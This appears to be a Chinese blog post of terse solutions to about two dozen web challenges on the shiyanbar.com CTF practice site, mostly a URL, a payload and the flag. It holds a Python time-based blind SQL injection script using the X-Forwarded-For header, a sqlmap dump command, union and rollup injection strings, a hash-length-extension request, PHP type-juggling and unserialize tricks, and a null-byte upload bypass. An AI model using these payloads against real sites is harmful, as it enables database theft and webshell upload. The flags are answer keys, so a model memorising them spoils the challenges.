实验吧ctf

1/登陆一下好吗??

http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
 ='
 ='
 ctf{51d1bf8fb65a8c2406513ee8f52283e7}

2/who are you ?
http://ctf5.shiyanbar.com/web/wonderkun/index.php

 import requests
import time
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
def exp(x,i):
    starttime=time.time()
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    xxx = "' or sleep(ascii(mid((select(flag)from(flag))from("+str(x)+")for(1)))=ascii('"+i+"')) and '1'='1"
    headers = {
    "Host": "ctf5.shiyanbar.com",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "X-FORWARDED-FOR": xxx
    }
    res = requests.get(url, headers=headers)
    s = time.time() - starttime;
    if s > 1:
        return 1
    else:
        return 0
for x in range(1,33):
    for i in payloads:
        if (exp(x,i)):
            flag+=i
            print flag
            break
        else: 
            pass
print 'flag:'+flag

 ctf{cdbf14c9551d5be5612f7bb5d2867853}

3/因缺思汀的绕过

 http://ctf5.shiyanbar.com/web/pcat/index.php
 uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2%23&pwd=
 CTF{with_rollup_interesting}

4/简单的sql注入之3

http://ctf5.shiyanbar.com/web/index_3.php
sqlmap -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=0' -D web1 --tables -T flag  --columns --dump

5/简单的sql注入之2

http://ctf5.shiyanbar.com/web/index_2.php

6/简单的sql注入
http://ctf5.shiyanbar.com/423/web/
7/看看响应头
http://ctf5.shiyanbar.com/web/10/10.php

import requests
import base64

url = 'http://ctf5.shiyanbar.com/web/10/10.php'
s = requests.session()
response = s.get(url)
head = response.headers
flag = base64.b64decode(head['FLAG']).split(':')[1]
data = {'key': flag}
result = s.post(url=url, data=data)
print result.text

CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}
7/让我进去
http://ctf5.shiyanbar.com/web/kzhan.php

 root@ubuntu:~/HashPump# hashpump 
Input Signature: 571580b26c65f306376d4f64e53cb5c7
Input Data: admin
Input Key Length: 20
Input Data to Add: 123
961a38ded0b8553041ca20dd34e8e189
admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00123

提交内容:

getmein=961a38ded0b8553041ca20dd34e8e189

username=admin&password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00123

CTF{cOOkieS_4nd_hAshIng_G0_w3LL_t0g3ther}
8/拐弯抹角

 http://ctf5.shiyanbar.com/10/indirection/
 CTF{PSEDUO_STATIC_DO_YOU_KNOW}
 直接访问得到flag,没意思。

9/Forms
http://ctf5.shiyanbar.com/10/main.php

 $a = $_POST["PIN"];
if ($a == -19827747736161128312837161661727773716166727272616149001823847) {
    echo "Congratulations! The flag is $flag";
} else {
    echo "User with provided PIN not found."; 
}
    
Congratulations! The flag is ctf{forms_are_easy}

10/天网管理系统
http://ctf5.shiyanbar.com/10/web1/

 ------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="password"

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas--
ctf{dwduwkhduw5465}

11/忘记密码了

 http://ctf5.shiyanbar.com/10/upload/
 .submit.php.swp
 GET /10/upload/submit.php?emailAddress=admin@simplexue.com&token=0000000000 
 flag is SimCTF{huachuan_TdsWX}

12/Once More
http://ctf5.shiyanbar.com/web/more.php

 /web/more.php?password=1e8%00*-* 
 Flag: CTF{Ch3ck_anD_Ch3ck}

13/Guess Next Session
http://ctf5.shiyanbar.com/web/Session.php

/web/Session.php?password=
Flag: CTF{Cl3ar_th3_S3ss1on}

14/FALSE
http://ctf5.shiyanbar.com/web/false.php

/web/false.php?name[]=1&password[]=2
Flag: CTF{t3st_th3_Sha1}

15/上传绕过
http://ctf5.shiyanbar.com/web/upload

------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="dir"

/uploads/2.php(注意这里是16进制的00)  jpg
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="file"; filename="2.jpg"
Content-Type: applications/octet-stream
/uploads/8a9e5f6a7a789acb.php<br>æ­å–œä½ èŽ·å¾—flag一枚:<br>flag{SimCTF_huachuan}</body>
</html>

16/NSCTF web200
http://ctf5.shiyanbar.com/web/web200.jpg

 
   $_ = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
   $_ = str_rot13($_);
   $_ = strrev($_);
   $_ = base64_decode($_);
   $_o = "";
   for($_0 = strlen($_) - 1;$_0 >= 0; $_0 --){
       $tmp = $_[$_0];
       $tmp = ord($tmp);
       $tmp --;
       $tmp = chr($tmp);
       $_o.=$tmp;
   }
   echo $_o;
?>
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

17/程序逻辑问题

http://ctf5.shiyanbar.com/web/5/index.php

user=' union /*!Select*/ 'c4ca4238a0b923820dcc509a6f75849b'-- - &pass=1
 Logged in! Key: SimCTF{youhaocongming}

18/what a fuck!这是什么鬼东西?
http://ctf5.shiyanbar.com/DUTCTF/1.html

 <script>**script>
 密码是:Ihatejs

19/PHP大法
http://ctf5.shiyanbar.com/DUTCTF/index.php

/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a
flag: DUTCTF{PHP_is_the_best_program_language}

20/这个看起来有点简单!
http://ctf5.shiyanbar.com/8/index.php?id=1

21/貌似有点难
http://ctf5.shiyanbar.com/phpaudit/
Modify Header 添加X-Forwarded-For:1.1.1.1 ;bp添加不好使。
SimCTF{daima_shengji}

21/头有点大

User-Agent:  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 .NET CLR 9.9)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-gb,en;q=0.5
The key is:HTTpH34der

22/Forbidden

Accept-Language: zh-hk,zh;q=0.8
KEY:123JustUserAGent
23/猫抓老鼠

Content-Row: MTUwMTE1NjUzNA==
Content-Length: 21
Content-Type: text/html

KEY: #WWWnsf0cus_NET#

24/看起来有点难

你可能感兴趣的:(CTF)